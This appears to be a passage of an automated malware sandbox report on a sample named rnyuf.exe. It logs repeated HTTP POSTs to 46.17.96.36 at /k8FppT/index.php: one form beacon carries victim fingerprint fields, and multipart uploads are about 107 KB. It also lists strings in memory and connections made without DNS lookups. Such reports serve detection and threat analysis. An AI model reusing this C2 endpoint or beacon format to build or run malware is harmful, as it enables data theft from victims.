              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3cHost: 46.17.96.36Content-Length: 107128Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3cHost: 46.17.96.36Content-Length: 107128Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3cHost: 46.17.96.36Content-Length: 107128Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3cHost: 46.17.96.36Content-Length: 107128Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3cHost: 46.17.96.36Content-Length: 107128Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3cHost: 46.17.96.36Content-Length: 107128Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----8072a178dbdc6167b19235baefba2abcHost: 46.17.96.36Content-Length: 107132Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----8072a178dbdc6167b19235baefba2abcHost: 46.17.96.36Content-Length: 107132Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----8072a178dbdc6167b19235baefba2abcHost: 46.17.96.36Content-Length: 107132Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----8072a178dbdc6167b19235baefba2abcHost: 46.17.96.36Content-Length: 107132Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----8072a178dbdc6167b19235baefba2abcHost: 46.17.96.36Content-Length: 107132Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----cc6e581ce94a2c7e20266147ae0a1079Host: 46.17.96.36Content-Length: 111522Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----8072a178dbdc6167b19235baefba2abcHost: 46.17.96.36Content-Length: 107132Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----8072a178dbdc6167b19235baefba2abcHost: 46.17.96.36Content-Length: 107132Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----8072a178dbdc6167b19235baefba2abcHost: 46.17.96.36Content-Length: 107132Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----8072a178dbdc6167b19235baefba2abcHost: 46.17.96.36Content-Length: 107132Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----8072a178dbdc6167b19235baefba2abcHost: 46.17.96.36Content-Length: 107132Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----8072a178dbdc6167b19235baefba2abcHost: 46.17.96.36Content-Length: 107132Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: Joe Sandbox ViewIP Address: 162.159.134.233 162.159.134.233
              Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownTCP traffic detected without corresponding DNS query: 46.17.96.36
              Source: unknownTCP traffic detected without corresponding DNS query: 46.17.96.36
              Source: unknownTCP traffic detected without corresponding DNS query: 46.17.96.36
              Source: unknownTCP traffic detected without corresponding DNS query: 46.17.96.36
              Source: unknownTCP traffic detected without corresponding DNS query: 46.17.96.36
              Source: unknownTCP traffic detected without corresponding DNS query: 46.17.96.36
              Source: unknownTCP traffic detected without corresponding DNS query: 46.17.96.36
              Source: unknownTCP traffic detected without corresponding DNS query: 46.17.96.36
              Source: unknownTCP traffic detected without corresponding DNS query: 46.17.96.36
              Source: unknownTCP traffic detected without corresponding DNS query: 46.17.96.36
              Source: unknownTCP traffic detected without corresponding DNS query: 46.17.96.36
              Source: unknownTCP traffic detected without corresponding DNS query: 46.17.96.36
              Source: unknownTCP traffic detected without corresponding DNS query: 46.17.96.36
              Source: unknownTCP traffic detected without corresponding DNS query: 46.17.96.36
              Source: unknownTCP traffic detected without corresponding DNS query: 46.17.96.36
              Source: unknownTCP traffic detected without corresponding DNS query: 46.17.96.36
              Source: unknownTCP traffic detected without corresponding DNS query: 46.17.96.36
              Source: unknownTCP traffic detected without corresponding DNS query: 46.17.96.36
              Source: unknownTCP traffic detected without corresponding DNS query: 46.17.96.36
              Source: unknownTCP traffic detected without corresponding DNS query: 46.17.96.36
              Source: unknownTCP traffic detected without corresponding DNS query: 46.17.96.36
              Source: unknownTCP traffic detected without corresponding DNS query: 46.17.96.36
              Source: unknownTCP traffic detected without corresponding DNS query: 46.17.96.36
              Source: unknownTCP traffic detected without corresponding DNS query: 46.17.96.36
              Source: unknownTCP traffic detected without corresponding DNS query: 46.17.96.36
              Source: unknownTCP traffic detected without corresponding DNS query: 46.17.96.36
              Source: unknownTCP traffic detected without corresponding DNS query: 46.17.96.36
              Source: unknownTCP traffic detected without corresponding DNS query: 46.17.96.36
              Source: unknownTCP traffic detected without corresponding DNS query: 46.17.96.36
              Source: unknownTCP traffic detected without corresponding DNS query: 46.17.96.36
              Source: unknownTCP traffic detected without corresponding DNS query: 46.17.96.36
              Source: unknownTCP traffic detected without corresponding DNS query: 46.17.96.36
              Source: unknownTCP traffic detected without corresponding DNS query: 46.17.96.36
              Source: unknownTCP traffic detected without corresponding DNS query: 46.17.96.36
              Source: unknownTCP traffic detected without corresponding DNS query: 46.17.96.36
              Source: unknownTCP traffic detected without corresponding DNS query: 46.17.96.36
              Source: unknownTCP traffic detected without corresponding DNS query: 46.17.96.36
              Source: unknownTCP traffic detected without corresponding DNS query: 46.17.96.36
              Source: unknownTCP traffic detected without corresponding DNS query: 46.17.96.36
              Source: unknownTCP traffic detected without corresponding DNS query: 46.17.96.36
              Source: unknownTCP traffic detected without corresponding DNS query: 46.17.96.36
              Source: unknownTCP traffic detected without corresponding DNS query: 46.17.96.36
              Source: unknownTCP traffic detected without corresponding DNS query: 46.17.96.36
              Source: unknownTCP traffic detected without corresponding DNS query: 46.17.96.36
              Source: unknownTCP traffic detected without corresponding DNS query: 46.17.96.36
              Source: unknownTCP traffic detected without corresponding DNS query: 46.17.96.36
              Source: unknownTCP traffic detected without corresponding DNS query: 46.17.96.36
              Source: unknownTCP traffic detected without corresponding DNS query: 46.17.96.36
              Source: unknownTCP traffic detected without corresponding DNS query: 46.17.96.36
              Source: unknownTCP traffic detected without corresponding DNS query: 46.17.96.36
              Source: rnyuf.exe, 00000005.00000002.938675353.00000000013A6000.00000004.00000020.sdmpString found in binary or memory: http://46.17.96.36/
              Source: rnyuf.exe, 00000005.00000002.938675353.00000000013A6000.00000004.00000020.sdmpString found in binary or memory: http://46.17.96.36/1
              Source: rnyuf.exe, 00000005.00000002.938675353.00000000013A6000.00000004.00000020.sdmpString found in binary or memory: http://46.17.96.36/17.96.36/k8FppT/index.php?scr=1
              Source: rnyuf.exe, 00000005.00000002.989859171.00000000046E2000.00000004.00000001.sdmpString found in binary or memory: http://46.17.96.36/k8F
              Source: rnyuf.exe, 00000005.00000002.989859171.00000000046E2000.00000004.00000001.sdmpString found in binary or memory: http://46.17.96.36/k8FppT/index.php
